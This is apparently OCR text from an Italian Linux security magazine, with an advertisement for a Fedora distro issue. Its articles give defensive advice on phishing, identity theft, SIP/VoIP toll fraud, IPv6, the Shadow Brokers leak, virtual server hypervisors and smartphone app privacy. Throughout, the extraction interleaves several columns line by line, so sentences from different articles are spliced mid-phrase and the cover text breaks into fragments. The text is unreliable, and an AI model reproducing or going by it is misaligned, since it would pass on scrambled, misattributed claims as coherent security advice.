di esempio, alla pubblicazione gratuita su qualsiasi supporto cartaceo e
non, su qualsiasi pubblicazione (anche non della Sprea S.p.A.), in qualsi-
asi canale di vendita e Paese del mondo.
Il materiale inviato alla redazione non potrà essere restituito.

128
colophon SECURITY LINUX.indd 1 19/01/17 16:27
 È IN EDICOLA
Il manuale completo + distro di Fedora

La tua DISTRO COMPLETA con MANUALE

PIÙ ELEGANTE DI WINDOWS E MAC OS
+
FREE SOFTWARE

VIETATO
A WINDOWS

Installazione FACILE
FACILE,, intuitiva e VELOCE
LETO
MANUALE COMP 2 VERSIONI Tantissime app,
32 e 64 bit
ck
llow Bla

tutte pronte
Ye
agenta
Cyan M

da installare
ccolta
: IMC ra
RIVISTA ITORI
REA ED

NON VA MAI
TÀ : SP
SOCIE
DATA :
S
E MAC O
INDOWS
IN CRASH
cd

IÙ EL EG A NTE DI W
TIVO P
A OPERA
IL SISTEM
IT O FEDORA
A 32 O
64 BIT Le opzioni
A S UB
INSTALL AI VIRUS
1

di configurazione
.indd
el 2017

DÌ ADDIO
VD lab
fedora_D

S I B LOCCA MAI!
E, NON DO VUOI
A SEMPR
FUNZION
LA TE O DA SCAR
ICABILI QUAN
sono facilissime
TUTTE LE AP
P GRATUITE
CHE VUOI, PR

C EM
EINST

EN
AL

T E E SEN
ZA PROB
LEMI VIRUS da impostare
LLA VELO
SI INSTA

Virtualizza
senza limiti
Muoversi sul desktop
Passa a FEDORA
ar e
senza
nulla grazie è tanto facile quanto
far ti manc
a Docker! intuitivo
OS e
di quello che Mac
Windows hanno

Microsoft
Office?
Microsoft Office?
No No grazie,
Virt ualizza senza
grazie, c’è c’è LibreOffice che
limiti grazie
a Docker! LibreOffice
fa le stesse cose
che fa le gratis
S IS T E M A O P E R A T IVO stesse
IL E cose gratis La virtualizzazione
S TA B IL E , E L EG A N T S O PERFETTA in Fedora
GNI U
LINUX PRO DISTRO n. 2 - Annuale € 9.90

E P E R F E T TO P E R O
per i
PROFESSIONISTI è semplicissima
2E 64 BIT
GENNAIO 2017

VERSIONI A 3 grazie a Docker

Distributore: Press-Di Distribuzione Stampa e Multimedia S.r.l.

28
02/12/16 11:
Fondello_FEDORA_DISTRO_210x297.indd 1 12/12/16 12:18

Acquistala su www.sprea.it/fedora
copertina ma
nuale fedora.ind
d 1

DISTRO FEDORA 207x285.indd 1 19/01/17 16:20

 PROTEGGITI SUBITO DA OGNI MINACCIA

FACILE COMPLETO GRATIS

Installi C’è tutto quello Proteggere
il nuovo che serve per il tuo computer
sistema la sicurezza non costa
in 20 minuti! del PC nulla!
LOTTA AI PIRATI DEL WI FI RIPULISCI I TUOI DISCHI SMARTPHONE BLINDATO

Se non fai attenzione a come Prima di vendere il tuo computer, Il tuo smartphone è la tua casa:
è configurato il tuo router, dei assicurati che nessun dato ci conservi le cose più preziose,
malintenzionati possono avere sensibile sia rimasto suoi dischi. è solo normale che sia protetto
facile accesso alla tua rete: ecco Con i nostri consigli ripulisci gli come il tuo appartamento.
come proteggerti al meglio hard disk una volta per tutte Così lo blindi da ogni attacco...

Protezione Generale
Hacking
Le nuove frontiere dell’hacking
Protezione Generale Lotta ai truffatori Protezione Generale Come operano gli hacker Dispositivi Mobili I rischi del mondo VoIP

Proteggere la Chi va in cerca di dati?

TOP SECRET
L’ATTACCO FRODI SIP
IPv4 vs IPv6
Sicurezza domestica U
n primo aspetto da analizzare, prima di presentare

Privacy
i risultati di alcune delle ricerche fatte, è il protocollo IP.

O Seguite questi suggerimenti per evitare di diventare un bersaglio

ALL’inTerneT
ramai la maggior parte delle persone è cosciente Vedere Come tutti sappiamo, lo “spazio” disponibile con IPv4
comparire una (l’attuale versione del protocollo IP) è praticamente terminato.
dell’antico adagio che recita: “Se qualcosa sembra

I
schermata
troppo bella per essere vera, quasi sicuramente n primo luogo è importante sfatare un mito: i virus pericolosità. È proprio l’ignoranza a essere il principale cavallo Questo è il motivo principale della transizione verso IPv6:
come questa
il mondo ha bisogno di nuovi indirizzi IP.

Occhio al portafoglio!
c’è dietro una truffa”. Sebbene il fenomeno del phishing per Linux esistono, così come ci sono diverse soluzioni di Troia che i malintenzionati utilizzano più spesso. Per fortuna,

DOSSIER HACKER
può essere
abbia attecchito promettendo facili guadagni, adesso antivirus adatte al Pinguino. La scarsa diffusione però, l’esperienza insegna e anche colossi del calibro di Adobe IP - Internet Protocol, è la “lingua” con la quale computer
un duro colpo
ha cambiato radicalmente modalità operative. sul nostro sistema è dovuta al fatto che mal si digerisce e Microsoft hanno fatto passi avanti. Anche loro stanno e oggetti intelligenti comunicano fra loro. Nella versione in cui
per chiunque.
lo utilizziamo sin dalla nascita di Internet, la versione IPv4,
Dietro alle false email che riceviamo quotidianamente, Ponete il download di programmi non richiesti dal Web. La maggior spingendo i propri utenti ad abbandonare Flash e Silverlight.
Cos’è

deLLe COSe
è in grado di collegare circa 4,3 miliardi di dispositivi. Una cifra
ci sono esperti di ingegneria sociale. Questa branca della
scienza si occupa di stabilire e studiare le reazioni umane
massima
attenzione
parte degli utenti, infatti, utilizza il proprio gestore
pacchetti per scaricare i software. Così facendo, si sfrutta
Il tutto a favore di HTML5. Molti di voi si staranno
domandando come si può vivere senza Flash. Parecchi siti apparentemente enorme, che certamente sembrava “sufficiente una frode SIP?
a dove fate a tutto” quando, diversi decenni fa, Arpanet progettò l’attuale rete Una truffa SIP consiste nello
a determinati stimoli, al fine di rubare informazioni un sistema che verifica l’integrità e l’autenticità di tutto continuano a usarlo e se siete soliti visitarli spesso potreste
click Internet. La crescente popolazione di Internet, però, sostenuta sfruttare a scopi di lucro
preziose. Il phishing, quindi, è diventato uno dei maggiori ciò che viene messo a disposizione. Il rischio di contrarre andare incontro a problemi di compatibilità. La soluzione

Scoprite i rischi connessi al mondo VoIP

dal sempre maggiore numero di persone che si collegano alla un sistema telefonico IP di qualcun altro.
rischi per la sicurezza online. dei malware è ridotto al minimo. è però a portata di mano. Basta installare Flashblock in modo
Cos’è
uno dei temi più
Rete e dal numero di dispositivi intelligenti interconnessi - telefoni, L’hacker, di solito, si trova in un paese
Crediti: Bromium Labs

I criminali che si avvalgono di questa tecnica hanno I team di sviluppo che fanno capo alle distro sono sempre da attivare Flash solo su richiesta. Naturalmente faremmo
e come mettervi al sicuro da bollette
La sicurezza è
a disposizione una grande quantità di strumenti. Uno dei più pronti a correggere le falle della sicurezza che di tanto in tanto uno sbaglio a considerare il plug-in di Adobe come unico
automobili, sensori e chi più ne ha più ne metta – ha superato
ormai da tempo il limite massimo (tecnicamente si chiama spazio SIP? diverso da quello del malcapitato.
A peggiorare la situazione c’è anche

anni. Abbiamo
comuni attacchi consiste nell’inviare un’email con un finto vengono segnalate. A meno di non utilizzare una distro source- responsabile dei nostri guai. Navigando in Rete si può

I truffatori muoiono che farebbero piangere chiunque

d’indirizzamento) messo a disposizione dal protocollo IPv4. semplicemente cambia. Alcuni attacchi, il phishing fra questi, sono Session Initiation un’endemica incapacità delle forze

caldi di questi
brand, di solito ripreso da quello di una banca famosa. based come Gentoo, i pacchetti di riqualificazione sono incappare in molti Javascript altrettanto dannosi. Ecco perché
Dalle Webcam alle automobili, passando per gli smart All’inizio del 2011 gli indirizzi IP disponibili sono terminati indipendenti dal protocollo IP e restano invariati in efficacia Protocol (SIP) dell’ordine nel gestire queste situazioni.

lata tra le
Potreste rimanere stupiti da quanto sia facile copiare stili, sempre a portata di mano e richiedono solo qualche secondo installare un add-on come NoScript diventa essenziale. è un protocollo
e da quel momento i collegamenti avvengono grazie a tecnologie e gravità. Altri saranno più difficili da portare a termine, e altri Il malfattore si connette a un IP PBX via

dalla voglia di mettere fatto una carrel

formulazione, formattazione e indirizzi email di istituti bancari tra download e installazione. Nella maggior parte dei sistemi Probabilmente dovrete configurare una whitelist di siti
TV le lavatrici con IP e i pace-maker…
per la segnalazione

,
di condivisione e conservazione degli indirizzi IP; tecnologie ancora potrebbero essere invece facilitati con il nuovo protocollo, Internet, utilizzando una serie di tecniche

più significative
o poste. Molto banalmente, basta registrare un dominio simile si aggrappano per rubare la vostra identità è enorme. domestici, l’interfaccia grafica è poi uno strumento che rende attendibili in cui far lavorare i JS, ma per il resto potrete e il controllo
che, quando sfruttate molto, introducono problemi che a dire il vero incorpora molti accorgimenti di sicurezza frutto

problematiche
a quello che si vuole utilizzare per prendere di mira gli utenti. Se vi inquadrano nel mirino, analizzano perfino le eventuali l’aggiornamento un processo semplice, intuitivo e alla portata lasciare fuori dalla porta quelle pagine che li utilizzano in modo delle sessioni che gli permettono di manipolare il sistema le credenziali SIP, utilizzate sempre
e malfunzionamenti. Niente panico, però: la soluzione esiste di venti anni di esperienza nell’utilizzo della vecchia versione

le mani sui vostri dati

di comunicazione per inoltrare le proprie chiamate. password molto complesse e soprattutto
Per esempio, è sufficiente sostituire la O con lo 0 (zero) o .it recensioni su Amazon che avete lasciato. Da lì si possono di tutti. Non bisogna mai scordare che la chiave per dormire fraudolento. Un altro componente aggiuntivo che non può

oni
e sta prendendo piede. Senza clamore, invisibilmente del protocollo IP. Vero è che, lavorando quotidianamente con multimediale.

soluzi
Nella maggior pare dei casi, lo scopo nuove. Non fate l’errore di usare la stessa
le
con .co. Il testo dell’email, di solito, fa riferimento a una verifica desumere interessi, acquisti e molti altri particolari sonni tranquilli è avere una distro sempre al passo con i tempi. mancare è AdBlockers. Serve per bloccare la pubblicità che

dovi
ma inesorabilmente, IPv6, la nuova versione del protocollo IP aziende private e istituzioni, diversi sono già stati i casi di realtà Per le chiamate

fornen
potenzialmente interessanti. Il tutto per Gli update, infatti, oltre ad aggiungere funzioni e risolvere talvolta veicola verso siti poco o per niente sicuri. Infine, per audio e video, dell’attacco non coincide con il furto in più occasioni. In questo modo, ridurrete

personali. Scoprite Prevenire gli attacchi

si sta diffondendo a macchia d’olio. La sua capacità permette che hanno subìto una violazione e furto di dati, filtrati attraverso
“L’ingegneria sociale ha lo scopo e server di informazioni personali, né con la volontà l’efficacia di eventuali attacchi Brute Force

per blindare PC
un unico scopo: spacciarsi per voi di fronte eventuali problemi hardware o software, devono essere garantirvi una buona sicurezza, è fondamentale mantenere di interconnettere un numero enorme di dispositivi: pari a poco IPv6, semplicemente perché i device di sicurezza delle vittime la telefonia
ai servizi che usate. Convincendo i sistemi considerati come il principale baluardo contro sempre aggiornato il firmware del vostro router. Eviterete così IP utilizza di compromettere l’integrità del sistema. Difendersi e prevenire le truffe o Dictionary. Un buon esempio di chiave
di studiare le reazioni umane di sicurezza automatizzati per la verifica i malintenzionati. I cracker tendono a sfruttare le falle del di farlo prendere di mira da chi ne sfrutta le vulnerabilità.
più di 3.4 seguito da 38 zeri o, per rendere meglio l’idea, non erano configurati per proteggersi anche da attacchi lanciati
comunemente SIP. Molto più semplicemente, l’obiettivo SIP non è impossibile. In primo robusta è costituito da una stringa che va

come difendervi...
al fine di carpire informazioni”
di sicurezza, in cui viene richiesto di confermare i propri dati
d’accesso su un sito fasullo. Non appena inseriamo
le credenziali nella finta interfaccia, la trappola si chiude.
Una variante di questi attacchi consiste nello Spear Phishing.
Si tratta di un sistema molto più diretto e pericoloso. Anziché
sparare nel mucchio come nella tecnica sopra illustrata,
L’autore un numero sufficiente a dare più che un indirizzo IP a ogni attraverso IPv6, mentre i dispositivi (router, switch, firewall, sistemi Le sue impostazioni
dell’identità, gli hacker possono richiedere
la reimpostazione delle password,
sistema per entrare. Se tutti i possibili appigli vengono rimossi
da un aggiornamento sistematico da parte del team Raoul Chiesa
granello di sabbia contenuto sulla crosta terrestre per una
profondità di oltre un chilometro. La migrazione al nuovo
operativi) automaticamente si erano già “adattati” al nuovo
protocollo oppure, in altri casi, essendo compatibili con il nuovo
definiscono
i dati inviati tra
è scroccare telefonate a numeri molto
costosi. L’hacker stabilisce un accordo con
luogo, è importante fare una
precisazione. Ci sono molti modi per
dagli 8 ai 20 fattori, senza parole di senso
compiuto, con caratteri speciali (per
la modifica dell’indirizzo email e molto altro di sviluppo, le probabilità che il delinquente di turno riesca Raoul “Nobody” Chiesa, classe ‘73, è un ethical hacker. Presidente di Security protocollo è già iniziata e diversi Paesi europei hanno già una protocollo, di “default” accettavano connessioni IPv6. Connessioni gli endpoint, un fornitore di numeri a tariffa maggiorata. hackerare un sistema telefonico. Le tecniche esempio ! @ # $) e case sensitive (alterna
ancora. Un ulteriore aspetto da tenere presente è la quantità a penetrare sono minime. Sempre per quanto riguarda Brokers SCpA, ricopre diversi ruoli istituzionali tra cui il Comitato Direttivo e le regole Chiamando questi recapiti a ripetizione, più utilizzate dipendono dal fornitore lettere maiuscole a minuscole).
significativa percentuale di utilizzo. In Svizzera, per esempio, che, come detto poc’anzi, spesso non erano monitorizzate,
Tecnico-Scientifico del CLUSIT (Associazione Italiana per la Sicurezza di chiamata,
di informazioni personali che date in pasto gratuitamente la presupposta invulnerabilità di Linux ai virus, è opportuno un utente residenziale su dieci già lo utilizza. In molti casi presidiate o controllate, né tanto meno regolate. Per maggiori si assicura una percentuale sul traffico. o produttore del PBX. A tal proposito, Se possibile, infine, cambiate la password
Informatica), membro del Permanent Stakeholders Group dell’ENISA (European le terminazioni
ai Social Network. Per conoscere vita, morte e miracoli di una considerare un altro aspetto importante. Molti attacchi Network & Information Security Agency), Board of Directors del capitolo italiano l’utilizzatore finale non si accorge nemmeno della transizione, approfondimenti sulla tematica IPv6 rimandiamo alla sezione è indispensabile integrare il maggior numero a intervalli brevi e regolari.
e molto altro ancora.
persona, il più delle volte basta dare un’occhiata al profilo di natura recente sono multipiattaforma. Quando viene di OWASP e del Comitato Tecnico di AIP/OPSI, nonché Special Advisor che avviene in maniera completamente trasparente. Da un punto del Rapporto CLUSIT 2013 scritto da Marco Misitano e reperibile Quali sono di misure per la sicurezza. Diversi fornitori
Facebook. Ci sono più dati al suo interno che in qualsiasi altro scoperta una vulnerabilità su un plug-in di Chrome, per sull’Hackers Profiling per le Nazioni Unite presso l’UNICRI.
di vista di sicurezza il panorama non peggiora, ma non migliora: all’indirizzo http://misitano.com/ipv6. i rischi? di SIP trunk offrono sistemi per il rilevamento Connessioni
posto. Per non parlare poi di Google. Date un’occhiata esempio, a farne le spese non sono solo gli utenti Windows,

P
Se gestite un vostro IP PBX, delle frodi. Uno di questi è il limite preventivo Usando la telefonia IP, potete
il criminale scende nel dettaglio. Assume l’identità di un a https://myaccount.google.com e controllate la sezione er quanto ci piacerebbe I risultati di un attacco informatico sono Gli obiettivi, infatti, sono ben altri: siti Web ma anche quelli che usano Mac OS X e Linux. Per citare un siete potenzialmente a rischio di spesa per il proprio account telefonico. connettervi al vostro PBX
funzionario di un’Ente, quindi vi contatta con una qualsiasi Gestisci le tue attività su Google. Procedete in Vai alle mie affermare il contrario, Internet infiniti. Per restringerne gli effetti, o infrastrutture di rete di vitale importanza. episodio reale, basta pensare a Flash. Uno degli add-on più Il CLUSIT e il suo Rapporto annuale sulla sicurezza ICT

S
e c’è una cosa che i recenti fatti
di cronaca hanno insegnato
è che non ci si può
assolutamente fidare della Rete.
C’è sempre qualcuno in agguato, pronto
a spiare e mettere a repentaglio
la nostra privacy. Non importa
“Il furto d’identità è la
La mole di dati che corre su Internet
è impressionante e purtroppo c’è molto
da rubare: password, codici, credenziali
per l’home banking e tanto altro. In questo
caso, seppure il danno sia importante
garantiscono il rimborso del maltolto.
Certo, ci vuole del tempo e dovrete
compilare una montagna di scartoffie,
ma alla fine riavrete quanto è stato
rubato. Le implicazioni sono diverse
quando parliamo di furto d’identità.
In questo caso, qualcuno si
scusa. Lo scopo è sempre lo stesso: carpire informazioni
personali e codici di accesso. Il modo in cui riesce
a impossessarsi delle informazioni circa la persona per cui
si spaccia è molto semplice. Spesso è sufficiente una veloce
ricerca su Google. Quasi tutte le banche o gli uffici pubblici
hanno una lista dei propri capi area, con tanto di curriculum
in bella vista. La quantità di informazioni a cui i malviventi
di truffe SIP. Un errore molto comune è non Così facendo, qualora il trunk venga violato, indipendentemente dal paese
attività e fatevi quattro risate. Ci sono i riferimenti di tutte non è tutto rose e fiori. Certo, potremmo definirli in tre categorie: lieve, In tali casi, il movente è molto più ampio inflazionanti in quanto ad attacchi e problemi di sicurezza. sentirsi chiamati in causa perché semplici potrete limitare i danni e cavarvela con in cui vi trovate. Siete in grado di installare
le ricerche che avete effettuato sul motore di ricerca, i video gli aspetti positivi della Rete quando i danni sono limitati e per risolvere rispetto al semplice furto. Si tratta È facile prendersela con i suoi sviluppatori e con la casa Il CLUSIT è l’Associazione Italiana per la delle informazioni nel nostro Paese, frutto temi già affrontati dai precedenti rapporti utenti. È vero che la maggior parte delle il massimale scelto.
di YouTube che avete visto, le indicazioni e perfino i frammenti sono tanti, ma a controbilanciare la partita basta cambiare una o più password. Medio, di spionaggio industriale o comunque madre. Il motivo per cui i cracker lo usano come vettore per Sicurezza Informatica, un ente no-profit del lavoro dei soci CLUSIT e con contributi CLUSIT, ma che per la loro straordinaria imboscate colpisce i provider di servizi per In aggiunta, si può
audio utilizzati con il famoso Ok Google. Viene tutto archiviato
minuziosamente, così da “migliorare la vostra esperienza
c’è tutto il sottofondo di malintenzionati
che hanno come solo obiettivo rubare,
se perdete dati personali o file importanti
come foto o documenti che comunque
di attività che hanno come obiettivo
il mettere KO uno o più organi
entrare nei nostri sistemi è proprio la sua popolarità. Flash
è utilizzato da milioni di persone che tuttora ne ignorano la
Quando si parla di Flash, agli esperti di sicurezza si rizzano i capelli.
Perfino Adobe sta prendendo le distanze dal suo plug-in
fondato nel 2000, con sede presso
l’Università degli Studi di Milano.
esterni importanti, tra cui segnalo la Polizia
Postale e delle Telecomunicazioni.
dinamica ed evoluzione rappresentano
scenari completamente nuovi.
la telefonia, ma il pericolo per gli utilizzatori cooperare con “Abilitare l’accesso remoto
Web”. In altre parole, il concetto di gratuito non esiste. estorcere, deturpare, infettare possono essere recuperati tramite un di comunicazione internazionali. Tutto Il CLUSIT a oggi conta più di 500 soci, sia La tematica IPv6, alla base della “Internet of Frutto di un lavoro di analisi e ricerca che ha
finali è altrettanto reale. Se siete piccoli
imprenditori che hanno investito sul proprio
il provider per
consentire o bloccare al PBX può facilitare
Si paga tutto e nel XXI secolo lo si fa con i dati personali. e danneggiare qualsiasi asset è basato sull’informatica singoli individui, professionisti dell’ICT Things”, è stata affrontata da Marco Misitano impegnato nel 2013 un centinaio di
IP PBX e avete un accordo con un fornitore determinate chiamate.
il compito degli hacker”

se si tratta di Stati con la mania
della sicurezza, reti pubblicitarie di
monitoraggio o hacker. Il concetto
è sempre lo stesso: i dati personali
I
peggior sciagura che
appropria dei vostri account e inizia
a fare danni incalcolabili: truffa,
digitale. Tutto ciò che viene
memorizzato sul vostro PC può “La maggior parte degli e se si mettono i bastoni fra
le ruote ai sistemi che Internet delle cose (cattive) Security, che aziende, le quali operano nel
settore dell’Information Security. Oltre ai
nel Rapporto 2013. Il rapporto contiene
inoltre i risultati di un sondaggio che ci ha
professionisti, tra cui l’autore di questo
articolo, e coinvolto oltre 200 aziende, il
l mondo delle telecomunicazioni
è significativamente cambiato
diventato il nuovo standard per le
comunicazioni moderne. Con il Private
di soluzioni Open Source ha permesso
agli smanettoni più sfegatati e a diverse
di SIP trunk, potreste pensare di non essere
tra le mire degli hacker. Purtroppo non
Se non avete
bisogno di inoltrare
possa capitarvi in Rete”
offende, mette in giro false accuse,
denigra e tenta di raggirare
Ombre ed equazioni essere rubato: password, liste
di contatti, dati della carta
attacchi informatici è rivolta governano l’andamento
di una nazione, è il Paese
Sempre più spesso si sente parlare
di Internet delle cose. Un mondo dove tutto
sistemi si baserà su tecnologia embedded
molto facile da aggiornare, ma gran parte
comunque, chi possiede un Raspberry Pi
può essere graziato. Sfruttando la porta
“Quaderni CLUSIT”, ricerche
monotematiche e quindi focalizzate su
consentito di studiare le tendenze del
mercato italiano dell’ICT Security,
rapporto rappresenta un importante punto di
riferimento per tutti coloro che operano nel a partire dal XXI secolo. L’uso Branch Exchange (PBX) basato su IP, aziende di implementare in tutta libertà è così. Basta veramente poco perché un comunicazioni internazionali o a numeri un client SIP nello smartphone e chiamare

sono costantemente nel mirino
di qualcuno. Al giorno d’oggi, ognuno
di noi ha una propria vita online: profili,
credenziali, accessi a siti Web e servizi.
4 5
e colpisca direttamente le tasche, può
essere assorbito. Le banche, infatti, hanno
tutte speciali polizze assicurative che
le persone a voi care.
Per fortuna potete prendere svariate
contromisure che andremo a illustrare
nelle pagine che seguono.
Recentemente è stata messa in vendita una
raccolta di strumenti molto potenti per l’hacking
ed exploit di vario tipo. Per stuzzicare l’appetito
dei potenziali acquirenti, il venditore ha messo
a disposizione un campione gratuito. Per il resto,
veniva chiesta la bellezza di 1 milione di dollari
in bitcoin. Il gruppo dietro la vendita, chiamato
Shadow Brocker, sostiene di aver rubato queste
armi informatiche a un altro team di hacker
conosciuto con il nome di Equation Group.
Quest’ultimo sembra sia strettamente legato alla
NSA, per cui pare esegua operazioni di vario tipo.
Equation ha convalidato la violazione dei propri
sistemi che hanno portato gli Shadow Brocker
a carpire il materiale poi messo in vendita. Alcuni
strumenti di questo arsenale consistono in una
serie di attacchi che sfruttano molte vulnerabilità
dei dispositivi di rete più utilizzati. Cisco
e Fortinet hanno quindi rilasciato
immediatamente diverse patch di emergenza.
Questo fa pensare che i programmi per l’hacking
rubati contenessero diversi exploit “zero-day”,
vale a dire componenti che sfruttano
vulnerabilità sconosciute perfino ai produttori.
di credito e via dicendo. I metodi verso infrastrutture aziendali”
con cui i cracker riescono
nell’interno sono tanti. Si parte da semplici
trucchi di ingegneria sociale come le email
di phishing, fino ad arrivare a espedienti più
mirati. Un Javascript malevolo iniettato
tramite un annuncio pubblicitario di terze
parti potrebbe essere un valido esempio.
12
backup. Disastroso, quando vi prosciugano
il conto corrente o rubano la vostra identità
digitale. A fronte di tutto ciò, è però
importante fare una considerazione.
Gli attacchi, tranne rari casi, non sono quasi
mai rivolti verso il vostro computer.
stesso a fermarsi. I dipendenti
di Belgacom, per esempio,
si sono trovati di fronte a un attacco
Watering Hole che faceva capo al
programma QUANTUMINSERT del GCHQ.
In pratica, ogni loro connessione verso
LinkedIn o Slashdot veniva rimandata
a copie fasulle di questi due servizi.
è interconnesso alla Rete e dove perfino
il frigorifero vi avvertirà se state finendo
il latte con un messaggio di posta
elettronica. A prima vista si tratta di un
balzo in avanti eccezionale. Se però vi
soffermate per un attimo a definire i rischi
per la sicurezza, l’euforia passa in un
momento. Certo, la maggior parte di questi
dell’hardware funziona ancora con driver
binari. Per le loro caratteristiche
intrinseche, nel caso dovessero essere
scoperte falle di sicurezza, non sarà
possibile aggiornarli. L’unico modo per
risolvere sarà acquistare lo stesso
dispositivo ma con una versione dei driver
più recente. In un certo qual modo,
GPIO, si connette a qualsiasi dispositivo singoli argomenti, oltre a diverse altre individuando le aree in cui si stanno settore, e per quelle persone che si stanno della tecnologia VoIP un proprio sistema criminale riesca a ottenere l’accesso a un IP premium, vi consigliamo di disabilitare chiunque al prezzo di un’urbana. Purtroppo,
(sensori, telecamere e via dicendo) e può
essere usato per l’aggiornamento dei driver.
pubblicazioni e al materiale proveniente dai
seminari formativi CLUSIT (gratuiti per i
orientando gli investimenti di aziende e
Pubbliche Amministrazioni, ed è completato
iniziando a interessare di InfoSec e
vorrebbero saperne un po’ di più. Il Rapporto
( Voice over Internet
Protocol ) ha permesso
“Sono tanti i criminali che di telefonia. Purtroppo,
però, c’è anche il rovescio
PBX non garantito e far lievitare la bolletta
del telefono oltre misura. In questo articolo
entrambe le opzioni. consentendo l’accesso in remoto al PBX,
essere preda di un hacker è piuttosto facile.
Si tratta però di una procedura non alla Soci), dal 2011 il CLUSIT pubblica il
“Rapporto CLUSIT sull’ICT Security in Italia”,
da numerosi focus on specifici su temi caldi
del momento, dai tablet ai Social Network,
viene presentato ogni anno a giornalisti,
politici, vertici delle Istituzioni Italiane,
a molte aziende
di migliorare la qualità
possono sfruttare la libertà della medaglia. Sono tanti
i criminali e le potenziali
vedremo alcuni semplici ma importanti
passaggi per mettersi in sicurezza.
Password
complesse
Applicare una rigida politica di sicurezza,
diventa quindi essenziale. Anziché
portata di tutti, ma solo degli utenti più
del VoIP per riempirsi le tasche”
esperti e smaliziati. Prima di fare un balzo un profilo neutrale, indipendente e dalle questioni del management della funzionari della PA legati al mondo ICT e ai della telefonia, riducendo organizzazioni di Non potrete ridurre a zero il rischio di frodi, Può sembrare semplice permettere connessioni al PBX da qualsiasi
nel futuro, quindi, valutate attentamente approfondito sullo status della sicurezza sicurezza a quelle della formazione, tutti CIO, CSO e CISO di Grandi Aziende. al contempo i costi malfattori che possono ma almeno sarete in grado di rendere e scontato, ma in un mondo parte del pianeta, è meglio bloccare tutto
i rischi che si corrono. di gestione e manutenzione. i sistemi sono in grado di offrire molte lucrare su questa libertà, trasformandola la vita più difficile a chi tenta di fregarvi. dove si utilizzano innumerevoli password per il traffico esterno. Tramite una whitelist
Se fate un balzo in avanti di un decennio, più funzioni rispetto alle piattaforme così in un moderno incubo fatto di cifre Utilizzeremo in particolare Asterisk PBX altrettanti servizi, la tentazione di usare di indirizzi IP, gestirete le comunicazioni solo
28 29 vi accorgerete subito come VoIP sia legacy PBX. Non solo, ma il vasto mondo da capogiro. su CentOS, ma i passaggi sono adattabili chiavi di accesso facilmente rintracciabili tra terminali sicuri. Naturalmente, se non
a qualsiasi piattaforma PBX su distro Linux. è sempre dietro l’angolo. Quando configurate utilizzate un indirizzo IP statico, le cose
13
90 91

Sicurezza di rete Server virtuali protetti Dispositivi Mobili Protezione per il telefono

Configurare Siete tutti osservati

attenzioni verso un ipervisore di tipo 1, come VMWare o Xen.
Questo modello permette agli OS guest di usare i propri kernel
così da usare il sistema preferito. L’ipervisore stesso è minimale
e gestisce tutto il dialogo con l’hardware a basso livello. Per
essere di una qualunque utilità agli OS guest, sopra all’ipervisore
deve girare un control domain (dom0), ovvero una VM Prevenite la curiosità delle app che vogliono accedere ai vostri dati
privilegiata ove gira un kernel abilitato a Xen che gestisce tutti

L
i guest non privilegiati e offre loro un’interfaccia per l’hardware.

un VPS sicuro
a maggior parte dei compiti che una volta con la procedura. Purtroppo, questo sistema specifiche di tutte le applicazioni installate e,
Il kernel Linux supporta Xen, ma potete anche usare NetBSD
venivano eseguiti solo dai computer, adesso addossa molta responsabilità agli utenti, che in teoria se tenete alla vostra riservatezza, la cosa migliore
o OpenSolaris come stack di controllo. Si dovrebbe anche
fa parte del background funzionale dovrebbero sapere se tali richieste di accesso sono che potete fare è disattivare la funzione di accesso
menzionare KVM, che fa un eccellente lavoro nel confondere
dei cellulari. Questi, infatti, possono essere usati come giustificate. Secondo alcuni studi (fonte: http://bit. ai contatti per ogni app che non ne fa strettamente
i limiti tra Tipo 1 e Tipo 2. Una volta caricato il modulo KVM, l’OS
lettori multimediali, registratori, dispositivi per giocare, ly/1bRbsVr), molte app richiedono fin troppe uso. XPrivacy, a questo punto, proteggerà le

Linux Pro Speciale N° 18 Bimestrale €9,90

host diventa un ipervisore utilizzabile da un virtualizzatore (come
Qemu) per lanciare un qualsiasi OS compatibile con
l’architettura della CPU. Qemu può virtualizzare x86, PowerPC
e S/390, sebbene emulare architetture diverse abbia un impatto
nelle performance. I guest ricadono in due categorie.
Paravirtualizzazione (PV): richiede un kernel abilitato a PV
così che il guest sappia che sta girando su hardware virtuale.
Virtualizzazione assistita dall’hardware (HVM):
controparte completa della paravirtualizzazione, richiede una
CPU con estensioni per la virtualizzazione che mitighino il costo
in performance associato all’emulazione di BIOS e altro
hardware. Per complicare ulteriormente le cose, i guest
completamente virtualizzati possono essere parzialmente
paravirtualizzati attraverso driver PV-on-HVM, per accelerare
l’I/O e introdurre delle aree grigie. Qualunque sia il percorso
navigatori GPS e molto altro ancora. Ovviamente,
per sfruttare tutte queste comodità sono necessarie
applicazioni dedicate. Purtroppo, però, sono proprio
le app l’anello debole della catena per quanto
riguarda la diffusione dei dati personali. Molte
di queste accedono ai vostri documenti per migliorare
l’esperienza d’uso, ma il problema risiede nel dovervi
assicurare che quanto utilizzato dall’applicazione non
venga inviato a soggetti terzi. Purtroppo, non tutte
le app spiegano nel dettaglio cosa ne faranno
dei vostri dati e quindi non potete sapere se siete
Elliptic Curve Crypto è così avanzato che potete generare anche chiavi più corte veramente al sicuro. Ci sono poi i servizi Web gratuiti
(256, 384 e 521 bit al posto di 1024, 2048, 3072 o 4096 per RSA) come Google, Twitter, Facebook e altri, che pur non
facendovi sborsare un euro, chiedono in cambio
informazioni sulla vostra persona. Queste vengono
autorizzazioni. Ci sono però diversi modi per
visualizzare le richieste fatte dalle applicazioni stesse.
L’app gratuita Clueful di BitDefender consente
di identificare ciò che un’applicazione sta facendo,
mettendolo in relazione con cosa invece dovrebbe
fare. Clueful, una volta installata, scansiona tutte
le vostre app classificandole con tre generi di rischio:
alto, medio, basso. È quindi possibile controllare la lista
e selezionare ciascuna applicazione, scoprendo
a quali funzioni può accedere. Se per caso dovessero
essere rilevati software ad alto rischio, il nostro
consiglio è di disinstallarli. C’è poi Anti-Malware
di Malwarebytes, che include anche un Privacy
Manager capace di analizzare le applicazioni
e dividerle in categorie secondo le funzioni dello
informazioni reali, dando in pasto alle applicazioni che
la richiedono una lista di dati fasulli. Detto questo,
oltre a prevenire che le app carpiscano senza il vostro
consenso le informazioni memorizzate nello
smartphone, dovreste anche ridurre i dati personali
che vi contenete. Condividere le immagini scattate
con lo smartphone, per esempio, è una fonte
inesauribile di informazioni, poiché a causa dei dati
EXIF è possibile venire a conoscenza di moltissimi
particolari. Se per esempio scattate una foto con
un dispositivo dotato di GPS, un malintenzionato può
rilevare la vostra posizione, il momento stesso in cui
avete scattato l’immagine e l’ID del dispositivo. Come
avrete ben capito, quindi, rimuovere le informazioni
EXIF dalle immagini prima di condividerle è molto

